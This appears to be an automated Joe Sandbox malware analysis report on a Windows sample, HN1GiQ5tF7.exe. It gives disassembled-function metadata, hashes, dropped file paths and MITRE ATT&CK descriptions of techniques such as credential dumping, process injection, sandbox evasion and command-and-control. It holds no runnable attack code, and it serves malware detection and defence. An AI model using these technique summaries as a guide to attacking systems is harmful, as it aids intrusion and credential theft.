Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 321e6fad1e89a7e4c28ae6b66fd11881297ab472d9a5d29b35abffa60ae66f3b
Instruction ID: 0545a202585b5a085541ce53fbaec5e04aa8eefb05eb6ec9a38ed2f6eaeab5a4
Opcode Fuzzy Hash: 321e6fad1e89a7e4c28ae6b66fd11881297ab472d9a5d29b35abffa60ae66f3b
Instruction Fuzzy Hash: 6F01D671A41104FBCB40E7A8C952EFE73AF9B05340F10002DB402B32D2EB605E4987B9

Function 00654D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00654D9E
__calloc_crt.LIBCMT ref: 00654DB7

Strings

"o, xrefs: 00654DCE

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __calloc_crt
String ID: "o
API String ID: 3494438863-2660150901
Opcode ID: a202a6fa186cbc9fa264a259122d2e0f2113ca1cd5741dd9b5a8199fb9992f10
Instruction ID: 9673b0face20b6593e8d5132ccc4945228d9d92f1efe4a77ab5af9923c596cdd
Opcode Fuzzy Hash: a202a6fa186cbc9fa264a259122d2e0f2113ca1cd5741dd9b5a8199fb9992f10
Instruction Fuzzy Hash: EEF0C87124A7039AE7149F5DBC616B667F7EB04769F10025EFA00CA294EB30C9C5CE98

Function 00634024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00630000,00000063,00000001,00000010,00000010,00000000), ref: 00634048
EnumResourceNamesW.KERNEL32(00000000,0000000E,006767E9,00000063,00000000,75A50280,?,?,00633EE1,?,?,000000FF), ref: 006A41B3

Strings

>c, xrefs: 00634028

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >c
API String ID: 1578290342-1901051651
Opcode ID: e445b105729f7125e3f8eb4691e76d6a55542a6d893ef138b1532dd19e3e98e7
Instruction ID: 1b175f04c8ce8af276e145f3f0e10141f4710bf1221f32df764aed204ec773cd
Opcode Fuzzy Hash: e445b105729f7125e3f8eb4691e76d6a55542a6d893ef138b1532dd19e3e98e7
Instruction Fuzzy Hash: 57F04971640210B6E3208B1AAC4AFE23AABE756BE5F101506F224AE2D0DAE19480CA94

Function 00677744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00677762
_wcscmp.LIBCMT ref: 00677774

Strings

#32770, xrefs: 0067776E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: f1fc36b4f33e8ce5fae72fdc1fe1b0fac289781ff571fbe1ad1fd8f6a698a882
Instruction ID: 70c3956652e25f74cb885adb198a188f2498342f3bd922923ff1ead264c9e026
Opcode Fuzzy Hash: f1fc36b4f33e8ce5fae72fdc1fe1b0fac289781ff571fbe1ad1fd8f6a698a882
Instruction Fuzzy Hash: 75E022B360032527D710EAA59C09ECBFBADAB51760F00011AB904D7141E670A64087D0

Function 0066A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0066A63F

Part of subcall function 006513F1: _doexit.LIBCMT ref: 006513FB

Strings

AutoIt, xrefs: 0066A633
Error allocating memory., xrefs: 0066A638

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 375bea0f1cdf0ffe719f3408a95e14a7b3af02e197f5ef09f72a356c4d0b75ab
Instruction ID: 08e82dad607eb0f68153a7fffc22d0ca103ec053f914fd73b6af805bd106fb8c
Opcode Fuzzy Hash: 375bea0f1cdf0ffe719f3408a95e14a7b3af02e197f5ef09f72a356c4d0b75ab
Instruction Fuzzy Hash: 01D05B313C531833D35436996C1BFD9764FDB15B51F051029BB0C995C359E6998041DD

Function 006AAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 006AACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006AAEBD

Strings

WIN_XPe, xrefs: 006AACD3

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: a9546d5368701b57bf3c2143e3ea08fbbefdb6ca3f4f0488d1b2b5695b90d49a
Instruction ID: bf2b4b455c3c6d50e36b46ca0b0a429d973fe1ad6c509db7d60450afcfb35c50
Opcode Fuzzy Hash: a9546d5368701b57bf3c2143e3ea08fbbefdb6ca3f4f0488d1b2b5695b90d49a
Instruction Fuzzy Hash: 43E06DB0C10149EFDB15EFE8D9849ECF7BAAB49300F109186E103B2260DB305E85DF26

Function 006986CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006986E2
PostMessageW.USER32(00000000), ref: 006986E9

Part of subcall function 00677A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00677AD0

Strings

Shell_TrayWnd, xrefs: 006986DB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: addf338b24942b05d2de4aab0432c068d1a73e35ccd68249aed06220e69ca162
Instruction ID: 8e717ba9bb19b4fec2df86314f4f7c18d6b97290a46caf4f2a0df64417772727
Opcode Fuzzy Hash: addf338b24942b05d2de4aab0432c068d1a73e35ccd68249aed06220e69ca162
Instruction Fuzzy Hash: 2FD0C9723853647BF3696771AC0BFC66A1A9B04B11F111919B649AA2D0D9A0A9808A58

Function 00698698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006986A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006986B5

Part of subcall function 00677A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00677AD0

Strings

Shell_TrayWnd, xrefs: 0069869B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 33bc1c7e8b12b25bd3b51a176a2aa1141f4e0c1cf465a17d3ff8b3d23a508e74
Instruction ID: 508cce46594e0592c16fc61800b787cfe255f8241a00516031740c98a039b49d
Opcode Fuzzy Hash: 33bc1c7e8b12b25bd3b51a176a2aa1141f4e0c1cf465a17d3ff8b3d23a508e74
Instruction Fuzzy Hash: 17D01272385364B7F3786771AC0FFC67B1A9B04B11F111919B749AE2D0D9E0E980CB54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HN1GiQ5tF7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\3q3Zl7JL

C:\Users\user\AppData\Local\Temp\autB907.tmp

C:\Users\user\AppData\Local\Temp\overroughly

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
HN1GiQ5tF7.exe

Function 0065B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00633D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0064DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0063406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0067FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00633F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0067BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00633742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00633E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 012F73C8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006349FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 006336B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 012F7178 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre